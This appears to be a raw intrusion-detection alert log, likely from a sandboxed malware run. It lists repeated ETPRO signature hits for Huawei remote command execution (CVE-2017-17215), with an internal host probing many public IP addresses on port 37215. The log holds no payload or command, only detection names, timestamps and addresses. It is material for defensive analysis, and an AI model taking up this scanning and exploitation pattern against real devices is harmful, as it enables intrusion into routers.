                                                        06/13/24-21:32:13.567257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5417837215192.168.2.14156.29.236.2
                                                        06/13/24-21:32:28.028039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5956437215192.168.2.14156.55.64.30
                                                        06/13/24-21:33:00.885734TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5604037215192.168.2.1441.220.175.2
                                                        06/13/24-21:32:25.993235TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650237215192.168.2.14156.186.223.83
                                                        06/13/24-21:32:58.823847TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4743637215192.168.2.14197.216.114.250
                                                        06/13/24-21:33:17.310285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4347037215192.168.2.1441.255.145.15
                                                        06/13/24-21:32:21.800013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5289837215192.168.2.1441.149.195.190
                                                        06/13/24-21:32:01.221680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5728037215192.168.2.14197.137.90.160
                                                        06/13/24-21:33:09.101755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4950437215192.168.2.14156.76.73.180
                                                        06/13/24-21:32:30.123630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5145037215192.168.2.14197.251.123.227
                                                        06/13/24-21:32:44.480890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5578637215192.168.2.14156.1.14.243
                                                        06/13/24-21:33:13.227358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5382437215192.168.2.1441.146.173.27
                                                        06/13/24-21:33:04.991001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530637215192.168.2.14197.8.134.186
                                                        06/13/24-21:32:21.785606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516437215192.168.2.14156.42.67.136
                                                        06/13/24-21:32:21.805117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4768037215192.168.2.14156.12.36.72
                                                        06/13/24-21:32:44.478222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967037215192.168.2.14156.192.9.198
                                                        06/13/24-21:32:28.026455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5084037215192.168.2.1441.242.179.230
                                                        06/13/24-21:32:03.294458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4797037215192.168.2.14197.128.125.18
                                                        06/13/24-21:32:34.192057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392037215192.168.2.1441.39.94.151
                                                        06/13/24-21:32:25.977755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4270037215192.168.2.1441.220.192.167
                                                        06/13/24-21:32:36.267622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861637215192.168.2.14197.130.36.136
                                                        06/13/24-21:32:46.509868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5744837215192.168.2.14156.10.214.241
                                                        06/13/24-21:32:17.696691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295037215192.168.2.14197.221.158.88
                                                        06/13/24-21:32:21.804575TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574437215192.168.2.14156.232.234.160
                                                        06/13/24-21:32:52.660566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5038637215192.168.2.1441.12.115.79
                                                        06/13/24-21:32:07.404035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416837215192.168.2.14197.27.64.221
                                                        06/13/24-21:32:17.694268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832637215192.168.2.14156.122.122.59
                                                        06/13/24-21:32:28.043236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4170037215192.168.2.1441.167.12.179
                                                        06/13/24-21:32:30.123531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3934837215192.168.2.1441.54.6.176
                                                        06/13/24-21:32:07.420138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009437215192.168.2.1441.142.220.65
                                                        06/13/24-21:32:32.153460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4271837215192.168.2.14197.54.223.123
                                                        06/13/24-21:32:36.265866TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398037215192.168.2.1441.184.58.43
                                                        06/13/24-21:33:09.108005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222437215192.168.2.1441.34.67.255
                                                        06/13/24-21:33:11.158344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5013437215192.168.2.14156.215.206.195
                                                        06/13/24-21:32:30.076276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890237215192.168.2.14156.90.10.146
                                                        06/13/24-21:33:04.989146TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419637215192.168.2.14156.176.138.91
                                                        06/13/24-21:33:09.106348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4413637215192.168.2.14156.132.143.150
                                                        06/13/24-21:33:15.274475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4156637215192.168.2.14197.119.189.109
                                                        06/13/24-21:32:15.635925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4211637215192.168.2.1441.149.7.195
                                                        06/13/24-21:32:25.976751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6010237215192.168.2.14156.156.122.127
                                                        06/13/24-21:32:58.824839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4019237215192.168.2.14197.11.134.144
                                                        06/13/24-21:32:17.694954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4262637215192.168.2.1441.109.101.34
                                                        06/13/24-21:33:09.087079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4143237215192.168.2.14197.242.197.58
                                                        06/13/24-21:32:01.248467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576237215192.168.2.14197.205.207.178
                                                        06/13/24-21:32:56.755361TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4019037215192.168.2.14197.90.95.235
                                                        06/13/24-21:31:59.177887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5536237215192.168.2.14197.232.150.242
                                                        06/13/24-21:32:25.973858TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5588837215192.168.2.14156.142.68.50
                                                        06/13/24-21:32:11.487300TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4743037215192.168.2.1441.176.236.167
                                                        06/13/24-21:32:28.043705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600237215192.168.2.14197.254.199.181
                                                        06/13/24-21:31:59.176815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3699237215192.168.2.1441.223.100.137
                                                        06/13/24-21:33:15.273578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4516437215192.168.2.1441.147.21.54
                                                        06/13/24-21:32:36.246570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5010037215192.168.2.14156.62.63.118
                                                        06/13/24-21:32:32.155006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098437215192.168.2.14156.34.187.19
                                                        06/13/24-21:32:17.672455TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4476237215192.168.2.1441.40.229.7
                                                        06/13/24-21:32:30.075934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4206237215192.168.2.14197.24.199.185
                                                        06/13/24-21:32:25.974580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4653437215192.168.2.1441.220.69.23
                                                        06/13/24-21:32:13.546598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993637215192.168.2.1441.63.248.195
                                                        06/13/24-21:32:30.078596TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039837215192.168.2.1441.255.170.209
                                                        06/13/24-21:32:17.678880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771237215192.168.2.14197.249.143.48
                                                        06/13/24-21:33:11.158664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5693637215192.168.2.14156.23.62.16
                                                        06/13/24-21:32:56.783429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4426437215192.168.2.14156.131.128.163
                                                        06/13/24-21:33:09.088187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432037215192.168.2.14197.25.43.174
                                                        06/13/24-21:32:03.307652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3584237215192.168.2.1441.118.151.101
                                                        06/13/24-21:32:34.217128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148837215192.168.2.1441.82.193.173
                                                        06/13/24-21:32:07.401934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4960037215192.168.2.14197.138.242.253
                                                        06/13/24-21:32:05.376562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831437215192.168.2.14156.150.133.156
                                                        06/13/24-21:32:15.609864TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562837215192.168.2.1441.141.117.123
                                                        06/13/24-21:32:15.632751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4478237215192.168.2.1441.237.75.184
                                                        06/13/24-21:32:25.975864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4276237215192.168.2.1441.182.111.101
                                                        06/13/24-21:32:58.823752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121037215192.168.2.14197.169.150.92
                                                        06/13/24-21:32:01.223385TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3582837215192.168.2.14197.138.128.159
                                                        06/13/24-21:32:36.262929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3793637215192.168.2.14156.44.63.84
                                                        06/13/24-21:33:09.128771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5110037215192.168.2.14197.34.60.94
                                                        06/13/24-21:31:57.093505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4024237215192.168.2.14156.250.246.86
                                                        06/13/24-21:31:57.093339TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4154837215192.168.2.1441.78.181.194
                                                        06/13/24-21:32:50.632126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5065037215192.168.2.14156.175.106.101
                                                        06/13/24-21:32:34.191987TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3777237215192.168.2.14197.116.144.46
                                                        06/13/24-21:32:03.278941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826237215192.168.2.14156.85.29.213
                                                        06/13/24-21:32:19.729599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4838237215192.168.2.1441.25.70.39
                                                        06/13/24-21:31:59.175752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5777037215192.168.2.14197.82.75.9
                                                        06/13/24-21:32:03.277854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4432237215192.168.2.1441.49.50.178
                                                        06/13/24-21:32:44.478314TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3810037215192.168.2.1441.3.102.57
                                                        06/13/24-21:32:19.751203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349037215192.168.2.14156.110.118.119
                                                        06/13/24-21:31:57.132899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970037215192.168.2.14156.118.1.139
                                                        06/13/24-21:32:30.126293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835637215192.168.2.14156.111.29.234
                                                        06/13/24-21:32:21.787311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5528837215192.168.2.14197.236.253.119
                                                        06/13/24-21:32:19.751359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979237215192.168.2.1441.172.193.34
                                                        06/13/24-21:32:03.278861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838037215192.168.2.14197.211.1.204
                                                        06/13/24-21:32:34.194395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3787437215192.168.2.14197.15.101.170
                                                        06/13/24-21:33:05.010098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475237215192.168.2.14156.221.180.131
                                                        06/13/24-21:32:34.216397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4170437215192.168.2.14197.122.241.194
                                                        06/13/24-21:32:30.079848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4464637215192.168.2.14197.1.139.84
                                                        06/13/24-21:32:07.401076TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772237215192.168.2.14156.113.115.131
                                                        06/13/24-21:32:15.633867TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5726437215192.168.2.14156.250.250.211
                                                        06/13/24-21:33:11.181451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4384837215192.168.2.14197.45.46.139
                                                        06/13/24-21:32:11.488056TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5870437215192.168.2.14156.50.128.249
                                                        06/13/24-21:32:44.477640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3860037215192.168.2.14197.148.59.255
                                                        06/13/24-21:32:48.567701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3345237215192.168.2.14197.165.159.16
                                                        06/13/24-21:32:58.841840TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802237215192.168.2.14197.231.242.78
                                                        06/13/24-21:32:15.610586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5402037215192.168.2.1441.25.147.48
                                                        06/13/24-21:32:05.371018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5446237215192.168.2.14156.226.79.18
                                                        06/13/24-21:32:50.611921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804237215192.168.2.1441.138.128.76
                                                        06/13/24-21:32:07.419999TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4307037215192.168.2.1441.80.32.222
                                                        06/13/24-21:32:15.631872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4505037215192.168.2.14197.183.126.179
                                                        06/13/24-21:32:42.422059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5324637215192.168.2.1441.55.110.32
                                                        06/13/24-21:32:17.694487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681237215192.168.2.14197.62.29.2
                                                        06/13/24-21:32:58.839728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277237215192.168.2.1441.6.118.191
                                                        06/13/24-21:32:17.696063TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5586637215192.168.2.1441.141.36.140
                                                        06/13/24-21:32:32.155758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482237215192.168.2.14197.187.54.175
                                                        06/13/24-21:33:09.127207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5484237215192.168.2.14197.95.206.157
                                                        06/13/24-21:32:25.993482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674637215192.168.2.14197.158.15.53
                                                        06/13/24-21:32:30.078537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4244837215192.168.2.14197.195.202.250
                                                        06/13/24-21:32:09.439828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630837215192.168.2.1441.70.14.221
                                                        06/13/24-21:32:15.610342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238437215192.168.2.14156.67.183.10
                                                        06/13/24-21:32:11.509270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5382637215192.168.2.14156.232.36.111
                                                        06/13/24-21:32:34.216440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193237215192.168.2.14156.243.74.39
                                                        06/13/24-21:32:30.128549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4966437215192.168.2.1441.249.247.34
                                                        06/13/24-21:31:57.091555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5073437215192.168.2.1441.179.176.65
                                                        06/13/24-21:32:38.321443TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3904637215192.168.2.14197.123.93.107
                                                        06/13/24-21:33:02.935491TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5194437215192.168.2.14156.1.143.146
                                                        06/13/24-21:32:25.973710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4377837215192.168.2.14197.63.75.87
                                                        06/13/24-21:33:11.159837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5891037215192.168.2.1441.126.171.135
                                                        06/13/24-21:32:54.725998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4969237215192.168.2.14197.17.14.60
                                                        06/13/24-21:32:48.566964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5401837215192.168.2.14197.71.243.10
                                                        06/13/24-21:32:19.729772TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5091437215192.168.2.1441.4.150.40
                                                        06/13/24-21:32:30.094210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042437215192.168.2.14156.162.114.182
                                                        06/13/24-21:32:28.046243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5865837215192.168.2.14197.132.171.147
                                                        06/13/24-21:32:32.156323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4961237215192.168.2.1441.91.66.204
                                                        06/13/24-21:32:28.026404TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901637215192.168.2.14197.214.80.23
                                                        06/13/24-21:32:30.100164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3877037215192.168.2.1441.121.111.72
                                                        06/13/24-21:32:25.970678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581437215192.168.2.14197.200.21.156
                                                        06/13/24-21:33:04.991744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305837215192.168.2.1441.71.152.127
                                                        06/13/24-21:32:17.697298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5616437215192.168.2.14156.119.226.78
                                                        06/13/24-21:32:42.422694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729837215192.168.2.14197.184.110.216
                                                        06/13/24-21:32:05.378345TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894437215192.168.2.14156.149.109.38
                                                        06/13/24-21:32:36.245198TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269637215192.168.2.14197.213.33.164
                                                        06/13/24-21:32:01.224399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4036237215192.168.2.14197.212.39.176
                                                        06/13/24-21:33:07.056381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5898237215192.168.2.1441.141.62.44
                                                        06/13/24-21:33:09.129809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5938637215192.168.2.14156.244.192.88
                                                        06/13/24-21:32:25.977881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706637215192.168.2.1441.191.59.225
                                                        06/13/24-21:32:40.374013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3835637215192.168.2.1441.217.181.160
                                                        06/13/24-21:32:40.375947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4693637215192.168.2.1441.174.237.3
                                                        06/13/24-21:32:46.527641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3566237215192.168.2.14197.66.88.247
                                                        06/13/24-21:32:54.724457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140837215192.168.2.1441.250.211.64
                                                        06/13/24-21:32:46.527762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5835837215192.168.2.14197.199.50.31
                                                        06/13/24-21:32:15.610012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3482037215192.168.2.14156.70.249.254
                                                        06/13/24-21:32:21.802832TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5452837215192.168.2.1441.75.137.44
                                                        06/13/24-21:33:07.041121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5162637215192.168.2.14197.2.10.53
                                                        06/13/24-21:32:48.567257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615637215192.168.2.14197.104.219.56
                                                        06/13/24-21:32:25.976159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3544437215192.168.2.14156.72.20.0
                                                        06/13/24-21:32:36.268913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429037215192.168.2.1441.164.250.22
                                                        06/13/24-21:32:21.801605TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5574037215192.168.2.14197.179.13.202
                                                        06/13/24-21:33:07.041562TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3912237215192.168.2.1441.130.207.1
                                                        06/13/24-21:33:15.258608TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4718637215192.168.2.1441.252.116.203
                                                        06/13/24-21:32:05.350147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5399837215192.168.2.1441.182.103.83
                                                        06/13/24-21:33:07.041992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558437215192.168.2.1441.14.46.230
                                                        06/13/24-21:33:15.252832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5568637215192.168.2.1441.76.203.99
                                                        06/13/24-21:31:57.092637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3479837215192.168.2.14156.34.3.191
                                                        06/13/24-21:32:05.350560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5670637215192.168.2.1441.55.231.220
                                                        06/13/24-21:32:30.123580TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4975437215192.168.2.14156.91.200.109
                                                        06/13/24-21:32:19.749280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3947837215192.168.2.14197.117.255.117
                                                        06/13/24-21:32:13.545004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615237215192.168.2.14197.16.164.175
                                                        06/13/24-21:32:56.756699TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5567637215192.168.2.1441.64.57.105
                                                        06/13/24-21:32:54.724757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674037215192.168.2.14156.136.230.204
                                                        06/13/24-21:33:09.089041TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3403837215192.168.2.14197.179.182.55
                                                        06/13/24-21:32:34.214025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4506637215192.168.2.14156.97.161.239
                                                        06/13/24-21:32:50.629856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018437215192.168.2.1441.130.44.3
                                                        06/13/24-21:33:09.111117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951637215192.168.2.1441.130.166.44
                                                        06/13/24-21:32:52.670439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4594237215192.168.2.14197.112.87.111
                                                        06/13/24-21:32:03.295467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4634637215192.168.2.14156.149.195.24
                                                        06/13/24-21:32:56.757050TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4709037215192.168.2.14197.115.70.100
                                                        06/13/24-21:31:59.177643TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3818437215192.168.2.14197.145.154.253
                                                        06/13/24-21:32:32.165019TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3868237215192.168.2.14156.73.8.238
                                                        06/13/24-21:32:52.657897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4125437215192.168.2.1441.8.195.48
                                                        06/13/24-21:33:09.109021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5854237215192.168.2.14156.233.78.178
                                                        06/13/24-21:32:52.669525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6049037215192.168.2.1441.124.22.194
                                                        06/13/24-21:32:50.632458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981637215192.168.2.14156.139.221.28
                                                        06/13/24-21:32:15.610057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5819637215192.168.2.1441.196.166.49
                                                        06/13/24-21:32:34.191631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4645637215192.168.2.14156.145.9.72
                                                        06/13/24-21:32:50.609976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901637215192.168.2.14197.198.149.6
                                                        06/13/24-21:33:04.988385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4865637215192.168.2.14156.223.247.227
                                                        06/13/24-21:32:19.750554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5468037215192.168.2.14156.217.237.92
                                                        06/13/24-21:32:09.440495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4195037215192.168.2.14197.102.44.176
                                                        06/13/24-21:32:28.042636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3340237215192.168.2.14197.213.54.63
                                                        06/13/24-21:33:15.258672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5058437215192.168.2.1441.150.97.178
                                                        06/13/24-21:32:56.754426TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414037215192.168.2.1441.23.43.98
